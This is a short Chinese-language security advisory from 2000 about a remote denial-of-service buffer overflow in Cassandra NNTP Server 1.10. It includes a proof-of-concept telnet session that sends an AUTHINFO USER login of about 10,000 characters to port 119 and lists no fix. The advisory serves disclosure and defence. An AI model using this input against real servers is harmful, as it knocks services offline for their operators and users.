CASSANDRA NNTPServer v1.10拒绝服务漏洞发布时间:2000-09-15 更新时间:2000-09-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Atrium Software Cassandra NNTP Server 1.10详细描述 在Cassandra NNTP v1.10存在缓冲溢出的漏洞,当在login name里输入超过10000字节的数据,会导致服务器无法响应。 测试代码 用下面的方法来测试: [host$ telnet target 119 Trying target... Connected to target. Escape character is '^]'. 200 CASSANDRA NNTP-Server (v1.10.01 Unregistered) for Windows 95 ready at Mon, 1 May 2000 xx:xx:xx +-300 (posting allowed) AUTHINFO USER <10 000 character string> Where buffer is 10000 characters. 解决方案 尚无 相关信息 |
